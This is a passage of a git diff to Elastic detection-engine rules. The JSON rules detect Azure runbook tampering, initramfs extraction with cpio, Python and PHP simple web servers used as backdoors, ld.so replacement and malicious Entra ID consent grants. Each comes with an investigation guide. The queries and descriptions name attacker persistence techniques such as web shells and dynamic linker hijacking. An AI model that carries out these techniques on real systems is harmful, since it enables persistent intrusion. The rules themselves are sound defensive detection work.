Azure Automation account, focusing on identifying any unauthorized access or changes made by adversaries.\n- Reset credentials and update access controls for the affected Azure Automation account to prevent further unauthorized access. 
Ensure that only authorized personnel have the necessary permissions to create or modify runbooks.\n- Implement additional monitoring and alerting for Azure Automation activities, specifically focusing on runbook creation and modification events, to enhance early detection of similar threats in the future.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised.\n- Document the incident, including all actions taken and findings, to improve response strategies and update incident response plans for future reference.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\"\n ) and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json b/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json index b592199b021..f6d190c9a04 100644 --- a/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json @@ -18,6 +18,13 @@ "https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "16acac42-b2f9-4802-9290-d6c30914db6e", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json b/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json deleted file mode 100644 index aca2bdb0645..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json +++ /dev/null @@ -1,125 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - 
"description": "This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.process*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*", - "logs-crowdstrike.fdr*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Initramfs Extraction via CPIO", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Initramfs Extraction via CPIO\n\nInitramfs is a temporary filesystem used during the Linux boot process, containing essential drivers and scripts. Attackers may exploit the `cpio` command to extract and modify initramfs, embedding malicious files to ensure persistence. The detection rule identifies suspicious `cpio` usage by monitoring process execution patterns, excluding legitimate parent processes, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the process execution details to confirm the presence of the cpio command with arguments \"-H\" or \"--format\" and \"newc\" to ensure the alert is not a false positive.\n- Investigate the parent process of the cpio command to determine if it is an unexpected or unauthorized process, as legitimate processes like mkinitramfs or dracut should be excluded.\n- Check the execution path of the parent process to verify if it matches any known legitimate paths such as \"/usr/share/initramfs-tools/*\" or \"/nix/store/*\".\n- Analyze the timeline of events around the cpio execution to identify any preceding or subsequent suspicious activities that might indicate a broader attack or persistence mechanism.\n- Examine the system for any unauthorized modifications or additions to the initramfs image that could indicate tampering or the presence of malicious files.\n- Correlate the alert with other security data sources like Elastic Endgame, Elastic Defend, or Crowdstrike to gather additional context and assess the scope of the potential threat.\n\n### False positive analysis\n\n- Legitimate system updates or maintenance activities may trigger the rule when tools like mkinitramfs or dracut are used. To handle this, ensure these processes are excluded by verifying that the parent process is mkinitramfs or dracut.\n- Custom scripts or automation tools that manage initramfs might use cpio in a non-malicious context. Review these scripts and add their parent process names or paths to the exclusion list if they are verified as safe.\n- Systems using non-standard initramfs management tools located in directories like /usr/share/initramfs-tools or /nix/store may cause false positives. Confirm these tools' legitimacy and update the exclusion paths accordingly.\n- Development or testing environments where initramfs is frequently modified for legitimate reasons can generate alerts. 
Consider creating environment-specific exceptions to reduce noise while maintaining security in production systems.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or spread of potential malware.\n- Terminate any suspicious processes related to the `cpio` command that do not have legitimate parent processes, such as `mkinitramfs` or `dracut`.\n- Conduct a thorough review of the extracted initramfs contents to identify and remove any unauthorized or malicious files.\n- Restore the initramfs from a known good backup to ensure system integrity and remove any potential persistence mechanisms.\n- Monitor the system for any further suspicious activity, particularly related to the `cpio` command, to ensure the threat has been fully mitigated.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems may be affected.\n- Update security policies and procedures to include specific checks for unauthorized `cpio` usage and enhance detection capabilities for similar threats.", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\") and\nprocess.name == \"cpio\" and process.args in (\"-H\", \"--format\") and process.args == \"newc\" and not (\n process.parent.name in (\"mkinitramfs\", \"dracut\") or\n process.parent.executable like~ (\"/usr/share/initramfs-tools/*\", \"/nix/store/*\")\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "17b3fcd1-90fb-4f5d-858c-dc1d998fa368", - "setup": "## Setup\nThis rule requires data coming in from Elastic Defend.\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1542", - "name": "Pre-OS Boot", - "reference": "https://attack.mitre.org/techniques/T1542/" - }, - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/" - }, - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 2 - }, - "id": "17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json b/packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json similarity index 50% rename from packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json rename to packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json index c663d88dcf8..40cf005519b 100644 --- a/packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json @@ -3,37 +3,32 @@ "author": [ "Elastic" ], - "description": "This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code.", + "description": "This rule detects connections accepted by a simple HTTP web server in Python and PHP built-in modules. Adversaries may create simple HTTP web servers to establish persistence on a compromised system by uploading a reverse or command shell payload to the server web root, allowing them to regain remote access to the system if lost. 
This event may occur when an attacker requests the server to execute a command or script via a potential backdoor.", "from": "now-9m", "index": [ - "logs-endpoint.events.file*", - "logs-sentinel_one_cloud_funnel.*", - "endgame-*" + "logs-endpoint.events.process*", + "logs-endpoint.events.network*" ], "language": "eql", "license": "Elastic License v2", - "name": "Dynamic Linker (ld.so) Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic Linker (ld.so) Creation\n\nThe dynamic linker, ld.so, is crucial in Linux environments for loading shared libraries required by executables. Adversaries may exploit this by replacing it with a malicious version to execute unauthorized code, achieving persistence or evading defenses. The detection rule identifies suspicious creation of ld.so files, excluding benign processes, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the process that triggered the alert by examining the process.executable field to understand which application attempted to create the ld.so file.\n- Check the process.name field to ensure the process is not one of the benign processes listed in the exclusion criteria, such as \"dockerd\", \"yum\", \"dnf\", \"microdnf\", or \"pacman\".\n- Investigate the file.path to confirm the location of the newly created ld.so file and verify if it matches any of the specified directories like \"/lib\", \"/lib64\", \"/usr/lib\", or \"/usr/lib64\".\n- Analyze the parent process of the suspicious executable to determine if it was initiated by a legitimate or potentially malicious source.\n- Look for any recent changes or anomalies in the system logs around the time of the file creation event to identify any related suspicious activities.\n- Cross-reference the event with other security tools or logs, such as Elastic Defend or SentinelOne, to gather additional context or corroborating evidence of malicious activity.\n- Assess the risk and impact of the event by considering the system's role and the potential consequences of a compromised dynamic linker on that system.\n\n### False positive analysis\n\n- Package managers like yum, dnf, microdnf, and pacman can trigger false positives when they update or install packages that involve the dynamic linker. These processes are already excluded in the rule, but ensure any custom package managers or scripts are also considered for exclusion.\n- Container management tools such as dockerd may create or modify ld.so files during container operations. If you use other container tools, consider adding them to the exclusion list to prevent false positives.\n- System updates or maintenance scripts that involve library updates might create ld.so files. Review these scripts and add them to the exclusion list if they are verified as non-threatening.\n- Custom administrative scripts or automation tools that interact with shared libraries could inadvertently trigger the rule. 
Identify these scripts and exclude them if they are part of regular, secure operations.\n- Development environments where ld.so files are frequently created or modified during testing and compilation processes may need specific exclusions for development tools or environments to avoid false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Verify the integrity of the dynamic linker (ld.so) on the affected system by comparing it with a known good version from a trusted source or repository.\n- If the dynamic linker has been tampered with, replace it with the verified version and ensure all system binaries are intact.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any additional malicious files or processes.\n- Review system logs and the process creation history to identify the source of the unauthorized ld.so creation and any associated malicious activity.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems are affected.\n- Implement additional monitoring and alerting for similar suspicious activities, such as unauthorized file creations in critical system directories, to enhance future detection capabilities.", - "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and process.executable != null and\nfile.path like~ (\"/lib/ld-linux*.so*\", \"/lib64/ld-linux*.so*\", \"/usr/lib/ld-linux*.so*\", \"/usr/lib64/ld-linux*.so*\") and\nnot process.name in (\"dockerd\", \"yum\", \"dnf\", \"microdnf\", \"pacman\")\n", + "name": "Simple HTTP Web Server Connection", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Simple HTTP Web Server Connection\n\nSimple HTTP servers in Python and PHP are often used for development and testing, providing a quick way to serve web content. However, attackers can exploit these servers to maintain access on compromised Linux systems by deploying backdoors or executing commands remotely. 
The detection rule identifies suspicious server activity by monitoring for specific process patterns and command-line arguments indicative of these lightweight servers, flagging potential misuse for further investigation.\n\n### Possible investigation steps\n\n- Review the process details, including the process name and command line arguments, to confirm if the server was started using Python or PHP, as indicated by the query fields.\n- Check the network connection details associated with the event, such as the source and destination IP addresses and ports, to identify any suspicious or unexpected connections.\n- Investigate the user account under which the process was initiated to determine if it aligns with expected behavior or if it indicates potential unauthorized access.\n- Examine the system logs and any related events around the time of the alert to identify any additional suspicious activities or anomalies.\n- Assess the server's web root directory for any unauthorized files or scripts that could indicate a backdoor or malicious payload.\n- Correlate this event with other alerts or indicators of compromise on the system to evaluate if this is part of a larger attack campaign.\n\n### False positive analysis\n\n- Development and testing environments may frequently trigger this rule when developers use Python or PHP's built-in HTTP servers for legitimate purposes. To manage this, consider excluding specific user accounts or IP addresses associated with development activities from the rule.\n- Automated scripts or cron jobs that start simple HTTP servers for routine tasks can also generate false positives. Identify these scripts and add their process names or command-line patterns to an exception list.\n- Educational or training environments where students are learning web development might cause alerts. In such cases, exclude the network segments or user groups associated with these activities.\n- Internal tools or services that rely on lightweight HTTP servers for functionality might be flagged. Review these tools and whitelist their specific process names or command-line arguments to prevent unnecessary alerts.\n- Temporary testing servers spun up for short-term projects can be mistaken for malicious activity. 
Document these instances and apply temporary exceptions during the project duration.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious Python or PHP processes identified by the detection rule to stop the potential backdoor or unauthorized server activity.\n- Conduct a thorough review of the system's file system, focusing on the web root directory, to identify and remove any unauthorized scripts or payloads that may have been uploaded.\n- Change all credentials associated with the compromised system, including SSH keys and passwords, to prevent attackers from regaining access.\n- Restore the system from a known good backup if any unauthorized changes or persistent threats are detected that cannot be easily remediated.\n- Implement network monitoring to detect any future unauthorized HTTP server activity, focusing on unusual process patterns and command-line arguments.\n- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network.", + "query": "sequence by process.entity_id with maxspan=1m\n[process where host.os.type == \"linux\" and event.type == \"start\" and \n (\n (process.name regex~ \"\"\"php?[0-9]?\\.?[0-9]{0,2}\"\"\" and process.command_line like \"*-S*\") or\n (process.name like \"python*\" and process.command_line like (\"*--cgi*\", \"*CGIHTTPServer*\"))\n )]\n[network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_accepted\"]\n", "related_integrations": [ { "package": "endpoint", "version": "^8.2.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" } ], "required_fields": [ { "ecs": true, - "name": "event.type", + "name": "event.action", "type": "keyword" }, { "ecs": true, - "name": "file.path", + "name": "event.type", "type": "keyword" }, { @@ -43,7 +38,12 @@ }, { "ecs": true, - "name": "process.executable", + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", "type": "keyword" }, { @@ -53,34 +53,39 @@ } ], "risk_score": 21, - "rule_id": "06d555e4-c8ce-4d90-90e1-ec7f66df5a6a", + "rule_id": "183f3cd2-4cc6-44c0-917c-c5d29ecdcf74", "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", "severity": "low", "tags": [ "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", "Resources: Investigation Guide" ], "threat": [ { "framework": "MITRE ATT&CK", "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" }, "technique": [ { - "id": "T1218", - "name": "System Binary Proxy Execution", - "reference": "https://attack.mitre.org/techniques/T1218/" + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] } ] }, @@ -109,30 +114,23 @@ { "framework": "MITRE ATT&CK", "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" }, "technique": [ { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" } ] } ], "timestamp_override": "event.ingested", "type": "eql", - "version": 102 + "version": 5 }, - "id": "06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102", + "id": "183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5", "type": "security-rule" } \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json deleted file mode 100644 index 0c564995b8b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. 
Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment.", - "false_positives": [ - "Application credential additions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Application credential additions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Application Credential Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Application Credential Modification\n\nAzure applications use credentials like certificates or secret strings for identity verification during token requests. Adversaries may exploit this by adding unauthorized credentials, enabling persistent access or evading defenses. The detection rule monitors audit logs for successful updates to application credentials, flagging potential misuse by identifying unauthorized credential modifications.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to identify the specific application that had its credentials updated, focusing on entries with the operation name \"Update application - Certificates and secrets management\" and a successful outcome.\n- Determine the identity of the user or service principal that performed the credential modification by examining the associated user or principal ID in the audit log entry.\n- Investigate the context of the credential modification by checking for any recent changes or unusual activities related to the application, such as modifications to permissions or roles.\n- Assess the legitimacy of the new credential by verifying if it aligns with expected operational procedures or if it was authorized by a known and trusted entity.\n- Check for any additional suspicious activities in the audit logs around the same timeframe, such as failed login attempts or other modifications to the application, to identify potential indicators of compromise.\n- Contact the application owner or relevant stakeholders to confirm whether the credential addition was expected and authorized, and gather any additional context or concerns they might have.\n\n### False positive analysis\n\n- Routine credential updates by authorized personnel can trigger alerts. Regularly review and document credential management activities to distinguish between legitimate and suspicious actions.\n- Automated processes or scripts that update application credentials as part of maintenance or deployment cycles may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts.\n- Credential updates during application scaling or migration might be flagged. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring thresholds or exclusions.\n- Third-party integrations that require periodic credential updates can be mistaken for unauthorized changes. 
Maintain an inventory of such integrations and establish baseline behaviors to filter out benign activities.\n- Frequent updates by specific service accounts could be part of normal operations. Monitor these accounts separately and consider creating exceptions for known, non-threatening patterns.\n\n### Response and remediation\n\n- Immediately revoke the unauthorized credentials by accessing the Azure portal and removing any suspicious certificates or secret strings associated with the affected application.\n- Conduct a thorough review of the application's access logs to identify any unauthorized access or actions performed using the compromised credentials.\n- Reset and update all legitimate credentials for the affected application to ensure no further unauthorized access can occur.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized credential modification and any potential impact.\n- Implement additional monitoring on the affected application to detect any further unauthorized changes or access attempts.\n- Review and tighten access controls and permissions for managing application credentials to prevent unauthorized modifications in the future.\n- If necessary, escalate the incident to higher-level security management or external cybersecurity experts for further investigation and response.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update application - Certificates and secrets management\" and event.outcome:(success or Success)\n", - "references": [ - "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json deleted file mode 100644 index 3a049725eab..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json +++ /dev/null @@ -1,132 +0,0 @@ -{ - "attributes": { - 
"author": [ - "Elastic" - ], - "description": "Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "investigation_fields": { - "field_names": [ - "@timestamp", - "event.action", - "event.outcome", - "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "azure.auditlogs.properties.initiated_by.user.ipAddress", - "azure.auditlogs.properties.additional_details.value", - "azure.tenant_id", - "cloud.region", - "azure.auditlogs.properties.target_resources.0.display_name" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft Entra ID Illicit Consent Grant via Registered Application", - "new_terms_fields": [ - "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "azure.auditlogs.properties.additional_details.value" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Illicit Consent Grant via Registered Application\n\nAdversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These applications can access sensitive data\u2014such as mail, profiles, or files\u2014on behalf of the user once consent is granted. This is commonly delivered via spearphishing links that prompt users to approve permissions for seemingly legitimate applications.\n\nThis rule identifies a new consent grant event based on Azure audit logs where the application was granted access with potentially risky scopes, such as offline_access, Mail.Read, or User.Read, and may include admin consent or tenant-wide delegation.\n\nThis is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days.\n\n#### Possible investigation steps\n\n- Review `azure.auditlogs.properties.additional_details.value` to identify the AppId and User-Agent values to determine which application was granted access and how the request was initiated. Pivot on the AppId in the Azure portal under Enterprise Applications to investigate further.\n- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to identify the user who approved the application. Investigate their recent activity for signs of phishing, account compromise, or anomalous behavior during the timeframe of the consent.\n- Review `azure.auditlogs.properties.initiated_by.user.ipAddress` to assess the geographic source of the consent action. 
